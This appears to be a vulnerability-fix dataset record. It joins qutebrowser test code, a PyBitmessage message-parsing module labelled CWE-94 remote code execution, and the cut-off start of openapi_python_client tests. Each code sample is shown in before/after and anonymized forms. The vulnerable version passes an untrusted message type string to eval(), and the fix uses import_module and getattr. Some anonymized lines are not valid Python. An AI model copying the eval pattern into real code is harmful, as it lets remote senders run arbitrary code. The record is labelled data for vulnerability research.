VAR_6.send_cmd(':open {}'.format(VAR_7))
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@VAR_0
def FUNC_4(VAR_4, VAR_5, VAR_2,
VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
['/VAR_17/user/föö.html'])
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'}, wait_focus=False)
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def FUNC_5(VAR_4, VAR_5, VAR_8,
VAR_2, VAR_6):
VAR_17 = VAR_2 / 'home'
VAR_17.ensure(dir=True)
VAR_8['HOME'] = str(VAR_17)
assert VAR_8['XDG_CONFIG_HOME'] == VAR_2 / 'config'
(VAR_2 / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
VAR_6.start(FUNC_0(VAR_4.config), VAR_16=VAR_8)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/download.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_18 = VAR_6.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
VAR_18.expected = True
VAR_6.wait_for(category='downloads',
message='Download download.bin finished')
assert (VAR_17 / 'download.bin').exists()
def FUNC_6(VAR_4, VAR_6):
VAR_6.start(VAR_11=['--temp-basedir', '--loglines=0'] +
FUNC_0(VAR_4.config))
VAR_6.open_path('qute://log')
assert VAR_6.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def FUNC_7(VAR_4, VAR_6, VAR_9, VAR_10):
VAR_6.start(VAR_11=['--temp-basedir'] + FUNC_0(VAR_4.config),
VAR_16={'PYTHONOPTIMIZE': VAR_10})
if VAR_10 == '2':
VAR_23 = ("Running on optimize VAR_10 higher than 1, unexpected behavior "
"may occur.")
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def FUNC_8(VAR_4):
VAR_11 = ['-m', 'qutebrowser', '--version'] + FUNC_0(VAR_4.config)
VAR_19 = QProcess()
VAR_19.setProcessChannelMode(QProcess.SeparateChannels)
VAR_19.start(sys.executable, VAR_11)
VAR_20 = VAR_19.waitForStarted(2000)
assert VAR_20
ok = VAR_19.waitForFinished(10000)
VAR_21 = bytes(VAR_19.readAllStandardOutput()).decode('utf-8')
print(VAR_21)
VAR_22 = bytes(VAR_19.readAllStandardError()).decode('utf-8')
print(VAR_22)
assert VAR_20
assert VAR_19.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\VAR_25+v\d+(\.\d+)', VAR_21) is not None
def FUNC_9(VAR_4, VAR_6, VAR_2):
VAR_11 = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(VAR_2 / 'does-not-exist')] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_23 = 'QCss::Parser - Failed to load file "*does-not-exist"'
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@utils.skip_qt511
def FUNC_10(VAR_4, VAR_6):
if not VAR_4.config.webengine:
pytest.skip()
VAR_11 = (['--temp-basedir', '--enable-webengine-inspector'] +
FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_18 = VAR_6.wait_for(
message='Remote debugging VAR_5 started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
VAR_24 = int(VAR_18.message.split(':')[-1])
VAR_25 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
VAR_25.connect(('127.0.0.1', VAR_24))
VAR_25.close()
@pytest.mark.linux
def FUNC_11(VAR_4, VAR_6, VAR_2):
if not VAR_4.config.webengine:
pytest.skip()
VAR_26 = VAR_2 / 'downloads'
VAR_26.ensure(dir=True)
(VAR_2 / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(VAR_26))
VAR_16 = {'XDG_CONFIG_HOME': str(VAR_2)}
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11, VAR_16=env)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_6.set_setting('downloads.location.directory', str(VAR_26))
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(message='Entering mode KeyMode.yesno *')
VAR_6.send_cmd(':prompt-accept yes')
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_27 = VAR_26.listdir()
assert len(VAR_27) == 1
assert VAR_27[0].basename == 'download.bin'
def FUNC_12(VAR_4, VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
[':quickmark-add https://www.example.com/ example'])
VAR_6.start(VAR_11)
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_13():
try:
VAR_19 = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], VAR_22=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert VAR_19.returncode == 1
VAR_28 = "At least Python 3.5 is required to run qutebrowser"
assert VAR_19.stderr.decode('ascii').startswith(VAR_28)
def FUNC_14(VAR_4, VAR_6):
VAR_11 = (FUNC_0(VAR_4.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- private: True
tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_15(VAR_2, VAR_4, VAR_6):
VAR_29 = VAR_2 / 'session.yml'
VAR_29.write('windows: []')
VAR_11 = FUNC_0(VAR_4.config) + ['--temp-basedir', '-r', str(VAR_29)]
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_16(VAR_3, VAR_4, VAR_6):
VAR_11 = FUNC_0(VAR_4.config) + ['--basedir', str(VAR_3)]
VAR_6.start(VAR_11)
VAR_6.open_path(
'qute://settings/set?option=search.ignore_case&value=always')
assert VAR_6.get_setting('search.ignore_case') == 'always'
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
VAR_6.start(VAR_11)
assert VAR_6.get_setting('search.ignore_case') == 'always'
|
import .subprocess
import .socket
import .sys
import logging
import re
import pytest
from PyQt5.QtCore import QProcess, qVersion
from helpers import utils
VAR_0 = pytest.mark.skipif(sys.hexversion >= 0x03070000,
reason="Python >= 3.7 doesn't force ASCII "
"locale with LC_ALL=C")
def FUNC_0(VAR_1):
VAR_11 = ['--debug', '--json-logging', '--no-err-windows']
if VAR_1.webengine:
VAR_11 += ['--backend', 'webengine']
else:
VAR_11 += ['--backend', 'webkit']
if qVersion() == '5.7.1':
VAR_11 += ['--qt-flag', 'disable-seccomp-filter-sandbox']
VAR_11.append('about:blank')
return VAR_11
@pytest.fixture
def VAR_8(VAR_2, VAR_3):
VAR_12 = VAR_2 / 'data'
VAR_13 = VAR_2 / 'config'
VAR_14 = VAR_3 / 'rt'
VAR_15 = VAR_2 / 'cache'
VAR_14.ensure(dir=True)
VAR_14.chmod(0o700)
(VAR_12 / 'qutebrowser' / 'state').write_text(
'[general]\nquickstart-done = 1\nbackend-warning-shown=1',
encoding='utf-8', ensure=True)
VAR_16 = {
'XDG_DATA_HOME': str(VAR_12),
'XDG_CONFIG_HOME': str(VAR_13),
'XDG_RUNTIME_DIR': str(VAR_14),
'XDG_CACHE_HOME': str(VAR_15),
}
return VAR_16
@pytest.mark.linux
@VAR_0
def FUNC_2(VAR_4, VAR_5, VAR_2, VAR_6):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('downloads.location.directory', str(VAR_2))
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/ä-issue908.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.wait_for(category='downloads',
message='Download ?-issue908.bin finished')
VAR_6.set_setting('downloads.location.prompt', 'true')
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_6.send_cmd(':prompt-open-download "{}" -c pass'
.format(sys.executable))
VAR_6.wait_for(category='downloads',
message='Download ä-issue908.bin finished')
VAR_6.wait_for(category='misc',
message='Opening * with [*python*]')
assert len(VAR_2.listdir()) == 1
assert (VAR_2 / '?-issue908.bin').exists()
@pytest.mark.linux
@pytest.mark.parametrize('url', ['/föö.html', 'file:///föö.html'])
@VAR_0
def FUNC_3(VAR_4, VAR_5, VAR_2, VAR_6, VAR_7):
VAR_11 = ['--temp-basedir'] + FUNC_0(VAR_4.config)
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'})
VAR_6.set_setting('url.auto_search', 'never')
VAR_6.send_cmd(':open {}'.format(VAR_7))
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f%C3%B6%C3%B6.html'>: LoadStatus.error")
@pytest.mark.linux
@VAR_0
def FUNC_4(VAR_4, VAR_5, VAR_2,
VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
['/VAR_17/user/föö.html'])
VAR_6.start(VAR_11, VAR_16={'LC_ALL': 'C'}, wait_focus=False)
if not VAR_4.config.webengine:
VAR_18 = VAR_6.wait_for(message="Error while loading *: Error "
"opening /*: No such file or directory")
VAR_18.expected = True
VAR_6.wait_for(message="load status for <* tab_id=* "
"url='*/f*.html'>: LoadStatus.error")
@pytest.mark.linux
def FUNC_5(VAR_4, VAR_5, VAR_8,
VAR_2, VAR_6):
VAR_17 = VAR_2 / 'home'
VAR_17.ensure(dir=True)
VAR_8['HOME'] = str(VAR_17)
assert VAR_8['XDG_CONFIG_HOME'] == VAR_2 / 'config'
(VAR_2 / 'config' / 'user-dirs.dirs').write('XDG_DOWNLOAD_DIR="relative"',
ensure=True)
VAR_6.start(FUNC_0(VAR_4.config), VAR_16=VAR_8)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_7 = 'http://localhost:{VAR_24}/data/downloads/download.bin'.format(
VAR_24=VAR_5.port)
VAR_6.send_cmd(':download {}'.format(VAR_7))
VAR_18 = VAR_6.wait_for(
loglevel=logging.ERROR, category='message',
message='XDG_DOWNLOAD_DIR points to a relative path - please check '
'your ~/.config/user-dirs.dirs. The download is saved in your '
'home directory.')
VAR_18.expected = True
VAR_6.wait_for(category='downloads',
message='Download download.bin finished')
assert (VAR_17 / 'download.bin').exists()
def FUNC_6(VAR_4, VAR_6):
VAR_6.start(VAR_11=['--temp-basedir', '--loglines=0'] +
FUNC_0(VAR_4.config))
VAR_6.open_path('qute://log')
assert VAR_6.get_content() == 'Log output was disabled.'
@pytest.mark.not_frozen
@pytest.mark.parametrize('level', ['1', '2'])
def FUNC_7(VAR_4, VAR_6, VAR_9, VAR_10):
VAR_6.start(VAR_11=['--temp-basedir'] + FUNC_0(VAR_4.config),
VAR_16={'PYTHONOPTIMIZE': VAR_10})
if VAR_10 == '2':
VAR_23 = ("Running on optimize VAR_10 higher than 1, unexpected behavior "
"may occur.")
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@pytest.mark.not_frozen
@pytest.mark.flaky # Fails sometimes with empty output...
def FUNC_8(VAR_4):
VAR_11 = ['-m', 'qutebrowser', '--version'] + FUNC_0(VAR_4.config)
VAR_19 = QProcess()
VAR_19.setProcessChannelMode(QProcess.SeparateChannels)
VAR_19.start(sys.executable, VAR_11)
VAR_20 = VAR_19.waitForStarted(2000)
assert VAR_20
ok = VAR_19.waitForFinished(10000)
VAR_21 = bytes(VAR_19.readAllStandardOutput()).decode('utf-8')
print(VAR_21)
VAR_22 = bytes(VAR_19.readAllStandardError()).decode('utf-8')
print(VAR_22)
assert VAR_20
assert VAR_19.exitStatus() == QProcess.NormalExit
assert re.search(r'^qutebrowser\VAR_25+v\d+(\.\d+)', VAR_21) is not None
def FUNC_9(VAR_4, VAR_6, VAR_2):
VAR_11 = (['--temp-basedir', '--qt-arg', 'stylesheet',
str(VAR_2 / 'does-not-exist')] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_23 = 'QCss::Parser - Failed to load file "*does-not-exist"'
VAR_18 = VAR_6.wait_for(message=VAR_23)
VAR_18.expected = True
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
@utils.skip_qt511
def FUNC_10(VAR_4, VAR_6):
if not VAR_4.config.webengine:
pytest.skip()
VAR_11 = (['--temp-basedir', '--enable-webengine-inspector'] +
FUNC_0(VAR_4.config))
VAR_6.start(VAR_11)
VAR_18 = VAR_6.wait_for(
message='Remote debugging VAR_5 started successfully. Try pointing a '
'Chromium-based browser to http://127.0.0.1:*')
VAR_24 = int(VAR_18.message.split(':')[-1])
VAR_25 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
VAR_25.connect(('127.0.0.1', VAR_24))
VAR_25.close()
@pytest.mark.linux
def FUNC_11(VAR_4, VAR_6, VAR_2):
if not VAR_4.config.webengine:
pytest.skip()
VAR_26 = VAR_2 / 'downloads'
VAR_26.ensure(dir=True)
(VAR_2 / 'user-dirs.dirs').write(
'XDG_DOWNLOAD_DIR={}'.format(VAR_26))
VAR_16 = {'XDG_CONFIG_HOME': str(VAR_2)}
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config))
VAR_6.start(VAR_11, VAR_16=env)
VAR_6.set_setting('downloads.location.prompt', 'false')
VAR_6.set_setting('downloads.location.directory', str(VAR_26))
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_6.open_path('data/downloads/download.bin', wait=False)
VAR_6.wait_for(message='Entering mode KeyMode.yesno *')
VAR_6.send_cmd(':prompt-accept yes')
VAR_6.wait_for(category='downloads', message='Download * finished')
VAR_27 = VAR_26.listdir()
assert len(VAR_27) == 1
assert VAR_27[0].basename == 'download.bin'
def FUNC_12(VAR_4, VAR_6):
VAR_11 = (['--temp-basedir'] + FUNC_0(VAR_4.config) +
[':quickmark-add https://www.example.com/ example'])
VAR_6.start(VAR_11)
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_13():
try:
VAR_19 = subprocess.run(['python2', '-m', 'qutebrowser',
'--no-err-windows'], VAR_22=subprocess.PIPE)
except FileNotFoundError:
pytest.skip("python2 not found")
assert VAR_19.returncode == 1
VAR_28 = "At least Python 3.5 is required to run qutebrowser"
assert VAR_19.stderr.decode('ascii').startswith(VAR_28)
def FUNC_14(VAR_4, VAR_6):
VAR_11 = (FUNC_0(VAR_4.config) +
['--temp-basedir', '-s', 'content.private_browsing', 'true'])
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- private: True
tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_15(VAR_2, VAR_4, VAR_6):
VAR_29 = VAR_2 / 'session.yml'
VAR_29.write('windows: []')
VAR_11 = FUNC_0(VAR_4.config) + ['--temp-basedir', '-r', str(VAR_29)]
VAR_6.start(VAR_11)
VAR_6.compare_session("""
windows:
- tabs:
- history:
- VAR_7: about:blank
""")
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
def FUNC_16(VAR_3, VAR_4, VAR_6):
VAR_11 = FUNC_0(VAR_4.config) + ['--basedir', str(VAR_3)]
VAR_6.start(VAR_11)
VAR_6.open_path('qute://settings/')
VAR_6.send_cmd(':jseval --world main '
'cset("search.ignore_case", "always")')
assert VAR_6.get_setting('search.ignore_case') == 'always'
VAR_6.send_cmd(':quit')
VAR_6.wait_for_quit()
VAR_6.start(VAR_11)
assert VAR_6.get_setting('search.ignore_case') == 'always'
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
27,
30,
32,
33,
37,
38,
47,
51,
52,
56,
64,
67,
71,
79,
80,
85,
92,
93,
100,
101,
110,
113,
114,
120,
126,
127,
128,
130,
135,
138,
139,
145,
148,
149,
153,
158,
161,
162,
167,
174,
178,
180,
193,
195,
196,
203,
204,
215,
216,
219,
220,
226,
227,
230,
235,
240,
243,
245,
246,
252,
256,
259,
260,
272,
276,
277,
283,
286,
292,
301,
305,
306,
309,
317,
318,
328,
329,
335,
343,
346,
347,
352,
355,
362,
365,
366,
374,
377,
380,
20,
40,
55,
56,
57,
58,
59,
84,
85,
86,
87,
88,
119,
120,
121,
122,
144,
145,
146,
147,
166,
167,
168,
169,
170,
198,
224,
248,
280,
308,
309,
310,
311,
331,
349,
368
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
17,
18,
19,
21,
27,
30,
32,
33,
37,
38,
47,
51,
52,
56,
64,
67,
71,
79,
80,
85,
92,
93,
100,
101,
110,
113,
114,
120,
126,
127,
128,
130,
135,
138,
139,
145,
148,
149,
153,
158,
161,
162,
167,
174,
178,
180,
193,
195,
196,
203,
204,
215,
216,
219,
220,
226,
227,
230,
235,
240,
243,
245,
246,
252,
256,
259,
260,
272,
276,
277,
283,
286,
292,
301,
305,
306,
309,
317,
318,
328,
329,
335,
343,
346,
347,
352,
355,
362,
365,
366,
374,
376,
379,
382,
20,
40,
55,
56,
57,
58,
59,
84,
85,
86,
87,
88,
119,
120,
121,
122,
144,
145,
146,
147,
166,
167,
168,
169,
170,
198,
224,
248,
280,
308,
309,
310,
311,
331,
349,
368
] |
5CWE-94
| from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class MsgBase(object):
def encode(self):
self.data = {"": lower(type(self).__name__)}
def constructObject(data):
try:
classBase = eval(data[""] + "." + data[""].title())
except NameError:
logger.error("Don't know how to handle message type: \"%s\"", data[""])
return None
try:
returnObj = classBase()
returnObj.decode(data)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return returnObj
if paths.frozen is not None:
import messagetypes.message
import messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
splitted = path.splitext(mod)
if splitted[1] != ".py":
continue
try:
import_module("." + splitted[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class MsgBase(object):
def encode(self):
self.data = {"": lower(type(self).__name__)}
def constructObject(data):
try:
m = import_module("messagetypes." + data[""])
classBase = getattr(m, data[""].title())
except (NameError, ImportError):
logger.error("Don't know how to handle message type: \"%s\"", data[""], exc_info=True)
return None
try:
returnObj = classBase()
returnObj.decode(data)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return returnObj
if paths.frozen is not None:
import messagetypes.message
import messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
splitted = path.splitext(mod)
if splitted[1] != ".py":
continue
try:
import_module("." + splitted[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| remote_code_execution | {
"code": [
" classBase = eval(data[\"\"] + \".\" + data[\"\"].title())",
" except NameError:",
" logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"])"
],
"line_no": [
15,
16,
17
]
} | {
"code": [
" m = import_module(\"messagetypes.\" + data[\"\"])",
" classBase = getattr(m, data[\"\"].title())",
" except (NameError, ImportError):",
" logger.error(\"Don't know how to handle message type: \\\"%s\\\"\", data[\"\"], exc_info=True)"
],
"line_no": [
15,
16,
17,
18
]
} | from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class CLASS_0(object):
def FUNC_1(self):
self.data = {"": lower(type(self).__name__)}
def FUNC_0(VAR_0):
try:
VAR_1 = eval(VAR_0[""] + "." + VAR_0[""].title())
except NameError:
logger.error("Don't know how to handle message type: \"%s\"", VAR_0[""])
return None
try:
VAR_2 = VAR_1()
VAR_2.decode(VAR_0)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return VAR_2
if paths.frozen is not None:
import messagetypes.message
import messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
VAR_3 = path.splitext(mod)
if VAR_3[1] != ".py":
continue
try:
import_module("." + VAR_3[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| from importlib import import_module
from os import path, listdir
from string import lower
from debug import logger
import paths
class CLASS_0(object):
def FUNC_1(self):
self.data = {"": lower(type(self).__name__)}
def FUNC_0(VAR_0):
try:
VAR_1 = import_module("messagetypes." + VAR_0[""])
VAR_2 = getattr(VAR_1, VAR_0[""].title())
except (NameError, ImportError):
logger.error("Don't know how to handle message type: \"%s\"", VAR_0[""], exc_info=True)
return None
try:
VAR_3 = VAR_2()
VAR_3.decode(VAR_0)
except KeyError as e:
logger.error("Missing mandatory key %s", e)
return None
except:
logger.error("classBase fail", exc_info=True)
return None
else:
return VAR_3
if paths.frozen is not None:
import .messagetypes.message
import .messagetypes.vote
else:
for mod in listdir(path.dirname(__file__)):
if mod == "__init__.py":
continue
VAR_4 = path.splitext(mod)
if VAR_4[1] != ".py":
continue
try:
import_module("." + VAR_4[0], "messagetypes")
except ImportError:
logger.error("Error importing %s", mod, exc_info=True)
else:
logger.debug("Imported message type module %s", mod)
| [
4,
7,
11,
12,
30,
47
] | [
4,
7,
11,
12,
31,
48
] |
5CWE-94
| import pytest
import openapi_python_client.schema as oai
from openapi_python_client.parser.errors import PropertyError
MODULE_NAME = "openapi_python_client.parser.properties"
class TestProperty:
def test_get_type_string(self):
from openapi_python_client.parser.properties import Property
p = Property(name="test", required=True, default=None)
p._type_string = "TestType"
assert p.get_type_string() == "TestType"
p.required = False
assert p.get_type_string() == "Optional[TestType]"
def test_to_string(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
get_type_string = mocker.patch.object(p, "get_type_string")
assert p.to_string() == f"{snake_case(name)}: {get_type_string()}"
p.required = False
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = None"
p.default = "TEST"
assert p.to_string() == f"{snake_case(name)}: {get_type_string()} = TEST"
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import Property
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = Property(name=name, required=True, default=None)
assert p.get_imports(prefix="") == set()
p.required = False
assert p.get_imports(prefix="") == {"from typing import Optional"}
class TestStringProperty:
def test___post_init__(self):
from openapi_python_client.parser.properties import StringProperty
sp = StringProperty(name="test", required=True, default="A Default Value",)
assert sp.default == '"A Default Value"'
def test_get_type_string(self):
from openapi_python_client.parser.properties import StringProperty
p = StringProperty(name="test", required=True, default=None)
assert p.get_type_string() == "str"
p.required = False
assert p.get_type_string() == "Optional[str]"
class TestDateTimeProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateTimeProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateTimeProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"from datetime import datetime",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"from datetime import datetime",
"from typing import cast",
}
class TestDateProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import DateProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
p = DateProperty(name=name, required=True, default=None)
assert p.get_imports(prefix="") == {
"from datetime import date",
"from typing import cast",
}
p.required = False
assert p.get_imports(prefix="") == {
"from typing import Optional",
"from datetime import date",
"from typing import cast",
}
class TestFileProperty:
def test_get_imports(self, mocker):
from openapi_python_client.parser.properties import FileProperty
name = mocker.MagicMock()
mocker.patch("openapi_python_client.utils.snake_case")
prefix = "blah"
p = FileProperty(name=name, required=True, default=None)
assert p.get_imports(prefix=prefix) == {f"from {prefix}.types import File", "from dataclasses import astuple"}
p.required = False
assert p.get_imports(prefix=prefix) == {
"from typing import Optional",
f"from {prefix}.types import File",
"from dataclasses import astuple",
}
class TestListProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_type_string = mocker.MagicMock()
inner_property.get_type_string.return_value = inner_type_string
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_type_string() == f"List[{inner_type_string}]"
p.required = False
assert p.get_type_string() == f"Optional[List[{inner_type_string}]]"
p = ListProperty(name="test", required=True, default=[], inner_property=inner_property)
assert p.default == f"field(default_factory=lambda: cast(List[{inner_type_string}], []))"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import ListProperty
inner_property = mocker.MagicMock()
inner_import = mocker.MagicMock()
inner_property.get_imports.return_value = {inner_import}
prefix = mocker.MagicMock()
p = ListProperty(name="test", required=True, default=None, inner_property=inner_property)
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import List",
"from typing import Optional",
}
p.default = mocker.MagicMock()
assert p.get_imports(prefix=prefix) == {
inner_import,
"from typing import Optional",
"from typing import List",
"from typing import cast",
"from dataclasses import field",
}
class TestUnionProperty:
def test_get_type_string(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_property_1.get_type_string.return_value = "inner_type_string_1"
inner_property_2 = mocker.MagicMock()
inner_property_2.get_type_string.return_value = "inner_type_string_2"
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_type_string() == "Union[inner_type_string_1, inner_type_string_2]"
p.required = False
assert p.get_type_string() == "Optional[Union[inner_type_string_1, inner_type_string_2]]"
def test_get_type_imports(self, mocker):
from openapi_python_client.parser.properties import UnionProperty
inner_property_1 = mocker.MagicMock()
inner_import_1 = mocker.MagicMock()
inner_property_1.get_imports.return_value = {inner_import_1}
inner_property_2 = mocker.MagicMock()
inner_import_2 = mocker.MagicMock()
inner_property_2.get_imports.return_value = {inner_import_2}
prefix = mocker.MagicMock()
p = UnionProperty(
name="test", required=True, default=None, inner_properties=[inner_property_1, inner_property_2]
)
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
}
p.required = False
assert p.get_imports(prefix=prefix) == {
inner_import_1,
inner_import_2,
"from typing import Union",
"from typing import Optional",
}
class TestEnumProperty:
def test___post_init__(self, mocker):
name = mocker.MagicMock()
snake_case = mocker.patch("openapi_python_client.utils.snake_case")
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
deduped_reference = mocker.MagicMock(class_name="Deduped")
from_ref = mocker.patch(
f"{MODULE_NAME}.Reference.from_ref", side_effect=[fake_reference, deduped_reference, deduped_reference]
)
from openapi_python_client.parser import properties
fake_dup_enum = mocker.MagicMock()
properties._existing_enums = {"MyTestEnum": fake_dup_enum}
values = {"FIRST": "first", "SECOND": "second"}
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "Deduped.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_has_calls([mocker.call("a_title"), mocker.call("MyTestEnum1")])
assert enum_property.reference == deduped_reference
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# Test encountering exactly the same Enum again
assert (
properties.EnumProperty(name=name, required=True, default="second", values=values, title="a_title",)
== enum_property
)
assert properties._existing_enums == {"MyTestEnum": fake_dup_enum, "Deduped": enum_property}
# What if an Enum exists with the same name, but has the same values? Don't dedupe that.
fake_dup_enum.values = values
from_ref.reset_mock()
from_ref.side_effect = [fake_reference]
enum_property = properties.EnumProperty(
name=name, required=True, default="second", values=values, title="a_title",
)
assert enum_property.default == "MyTestEnum.SECOND"
assert enum_property.python_name == snake_case(name)
from_ref.assert_called_once_with("a_title")
assert enum_property.reference == fake_reference
assert len(properties._existing_enums) == 2
properties._existing_enums = {}
def test_get_type_string(self, mocker):
fake_reference = mocker.MagicMock(class_name="MyTestEnum")
mocker.patch(f"{MODULE_NAME}.Reference.from_ref", return_value=fake_reference)
from openapi_python_client.parser import properties
enum_property = properties.EnumProperty(name="test", required=True, default=None, values={}, title="a_title")
assert enum_property.get_type_string() == "MyTestEnum"
enum_property.required = False
assert enum_property.get_type_string() == "Optional[MyTestEnum]"
properties._existing_enums = {}
def test_get_imports(self, mocker):
